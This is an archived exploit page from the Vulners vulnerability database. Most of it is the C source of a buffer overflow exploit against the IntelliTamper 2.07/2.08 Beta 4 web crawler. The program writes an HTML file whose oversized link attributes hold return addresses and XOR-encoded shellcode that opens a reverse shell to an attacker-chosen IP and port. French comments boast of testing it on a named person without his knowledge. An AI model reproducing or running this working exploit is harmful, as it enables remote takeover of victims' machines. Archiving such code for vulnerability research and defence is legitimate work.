Vulners
Lucene search
IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
/********************************************************************/
/* [Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit by kralor [Crpt] */
/********************************************************************/
/* NO MORE */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/********************************************************************/
/* Exploit testé sur Jef_FR a son insu, ca marche bien a 100% :) */
/* Jef_FR pourra vous le confirmer hihi :P */
/* Au fait c'est universel pcq si la personne utilise la v2.08beta4 */
/* ben y'a du SEH alors le premier lien qui est fait plus petit */
/* pour la v2.07 ca fera pas planter, ca sera pris en charge par le */
/* programme.. Bref que dire de plus... Si ce n'est qu'on peut p-e */
/* jumper direct sans aller a un jmp ebx, en utilisant 0x00F1FFDC */
/* j'ai remarqué que sur les deux versions une fois que ca crash */
/* (je catch l'exception meme si le prog a du SEH!) ebx pointe vers */
/* cet offset toujours le meme (~fin de notre buffer). J'ai pas */
/* regardé sur d'autres plateformes, vu que j'ai deja des ret */
/* (jmp ebx) qui vont tres bien :) c'est tout les poulets, enjoy. */
/* */
/* P.S: Faut regarder que votre IP xoré par 0x98 donne pas un bad */
/* opcode du genre < > " \r \n ... C'est pas sorcier a coder :) */
/********************************************************************/
/* informations: www.coromputer.net, irc undernet #coromputer */
/********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock.h>
#pragma comment(lib, "ws2_32")
#else
#include <arpa/inet.h>
#endif
#define SIZEOF 14448 /* IntelliTamper v2.08 Beta 4 AND v2.07
* for v2.07 it isn't this size 'cause
* there's a *missing* in RET_ADDR2
* so it cuts the size.
*/
#define SCOFFSET 10000 /* IntelliTamper v2.08 Beta 4 */
#define RET_POS SIZEOF-4
#define RET_ADDR 0x004368C4
#define SCOFFSET2 100 /* IntelliTamper v2.07 */
#define RET_POS2 6832
#define RET_ADDR2 0x00437224
#define u_short unsigned short
#define u_char unsigned char
#define HOP 0xd9 /* host opcode */
#define POP 0xda /* port opcode */
#define BEGIN "<HTML><HEAD>hi</HEAD>\r\n<BODY>\r\n"
#define END "</BODY>\r\n</HTML>"
int set_sc(char *host,unsigned long port, char *sc)
{
unsigned long ip,p;
unsigned int i;
ip=inet_addr(host)^0x98989898;
p=htons((u_short)port);
p=p<<16;
p+=0x0002;
p=p^0x98989898;
for(i=0;i<strlen(sc);i++) {
if((u_char)sc[i]==HOP&&(u_char)sc[i+1]==HOP)
if((u_char)sc[i+2]==HOP&&(u_char)sc[i+3]==HOP) {
memcpy(sc+i,&ip,4);
ip=0;
}
if((u_char)sc[i]==POP&&(u_char)sc[i+1]==POP)
if((u_char)sc[i+2]==POP&&(u_char)sc[i+3]==POP) {
memcpy(sc+i,&p,4);
p=0;
}
}
if(ip||p) {
printf("error: unable to find ip/port sequence in shellc0de\n");
return -1;
}
return 0;
}
void syntax(char *prog)
{
printf("syntax: %s <file> <rshell_ip> <rshell_port>\n",prog);
exit(0);
}
void banner(void)
{
printf("\n\t[Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit " \
"by kralor [Crpt]\n");
printf("\t\t www.coromputer.net && undernet #coromputer\n\n");
return;
}
int main(int argc, char *argv[])
{
char buffer[SIZEOF];
unsigned long port;
FILE *file;
char shellc0de[] = /* sizeof(shellc0de+xorer) == 334 bytes */
/* classic xorer */
/* "\xcc" */
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
"\xb9\x3f\x01\x80\x33\x98\x43\xe2\xfa"
/* shellc0de */
"\x19\x5c\x50\x98\x98\x98\x13\x74\x13\x6c\xcd\xce\xfc\x39\xa8\x98"
"\x98\x98\x13\xd8\x94\x13\xe8\x84\x35\x13\xf0\x90\x73\x98\x13\x5d"
"\xc6\xc5\x11\x9e\x67\xae\xf0\x16\xd6\x96\x74\x70\x35\x98\x98\x98"
"\xf0\xab\xaa\x98\x98\xf0\xef\xeb\xaa\xc7\xcc\x67\x48\x13\x60\xcf"
"\xf0\x41\x91\x6d\x35\x70\x0b\x98\x98\x98\xab\x51\xc9\xc9\xc9\xc9"
"\xd9\xc9\xd9\xc9\x67\x48\x11\xde\xbc\xcf\xf0\x74\x61\x32\xf8\x70"
"\xe1\x98\x98\x98\xf0\xd9\xd9\xd9\xd9\xf0\xda\xda\xda\xda\x13\x54"
"\xf2\x88\xc9\x67\xee\xbc\x67\x48\xf0\xfb\xf5\xfc\x98\x11\xfe\xa8"
"\x67\xae\xf0\xea\x66\x2b\x8e\x70\xc9\x98\x98\x98\x11\xde\x86\x1b"
"\x74\xcc\x15\xa4\xbc\xab\x58\xab\x51\x1b\x59\x8d\x33\x7a\x65\x5e"
"\xdc\xbc\x88\xdc\x66\xdc\xbc\xa5\x66\xdc\xbc\xa4\x13\xde\xbc\x11"
"\xdc\xbc\xd0\x11\xdc\xbc\xd4\x11\xdc\xbc\xc8\x15\xdc\xbc\x88\xcc"
"\xc8\xc9\xc9\xc9\xf2\x99\xc9\xc9\x67\xee\xa8\xc9\x67\xce\x86\x67"
"\xae\xf0\x77\x56\x78\xf8\x70\x9a\x98\x98\x98\x67\x48\xcb\xcd\xce"
"\xcf\x13\xf4\xbc\x80\x13\xdd\xa4\x13\xcc\x9d\xe0\x9b\x4d\x13\xd2"
"\x80\x13\xc2\xb8\x9b\x45\x7b\xaa\xd1\x13\xac\x13\x9b\x6d\xab\x67"
"\x64\xab\x58\x34\xa2\x5c\xec\x9f\x59\x57\x95\x9b\x60\x73\x6a\xa3"
"\xe4\xbc\x8c\xed\x79\x13\xc2\xbc\x9b\x45\xfe\x13\x94\xd3\x13\xc2"
"\x84\x9b\x45\x13\x9c\x13\x9b\x5d\x73\x9a\xab\x58\x13\x4d\xc7\xc6"
"\xc5\xc3\x5a\x9c\x98";
banner();
if(argc!=4)
syntax(argv[0]);
port=atoi(argv[3]);
if(port<=0||port>65535) {
printf("error: <port> must be between 1 and 65535\r\n");
return -1;
}
printf("[S] ip: %s port: %d file: %s\r\n",argv[2],port,argv[1]);
printf("[C] Setting universal %-39s ...","shellcode");
if(set_sc(argv[2],port,shellc0de))
return -1;
printf("DONE\r\n");
file=fopen(argv[1],"w");
if(!file) {
printf("error: unable to open %s\r\n",argv[1]);
return -1;
}
printf("[C] Writing magic link for Intellitamper %-20s ...","v2.07");
fprintf(file,BEGIN);
fprintf(file,"sex drugs and rock'n'roll<BR>\r\n");
memset(buffer,0x90,sizeof(buffer));
*(unsigned long*)&buffer[RET_POS2] = RET_ADDR2;
memcpy(buffer+SCOFFSET2,shellc0de,sizeof(shellc0de)-1);
memcpy(buffer+6836-8,"\xEB\xE0",2); /* jmp $ - 0x10 */
memcpy(buffer+6836-16,"\xE9\x8F\xE5\xFF\xFF",5); /* jmp $ - ??? */
fprintf(file,"<A HREF=\"");
fprintf(file,buffer);
fprintf(file,"\">sexy bitch</A><BR>\r\n");
printf("DONE\r\n");
printf("[C] Writing magic link for Intellitamper %-20s ...","v2.08 Beta 4");
memset(buffer,0x90,sizeof(buffer));
*(unsigned long*)&buffer[RET_POS] = RET_ADDR;
memcpy(buffer+SCOFFSET,shellc0de,sizeof(shellc0de)-1);
memcpy(buffer+SIZEOF-8,"\xEB\xE0",2); /* jmp $ - 0x10 */
memcpy(buffer+SIZEOF-16,"\xE9\x8F\xEB\xFF\xFF",5); /* jmp $ - ??? */
fprintf(file,"<A HREF=\"");
fprintf(file,buffer);
fprintf(file,"\">not sexy bitch</A><BR>\r\n");
printf("DONE\r\n");
fprintf(file,END);
fclose(file);
printf("[C] All job done\r\n");
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Aug 2008 00:00Current
7.1High risk
Vulners AI Score7.1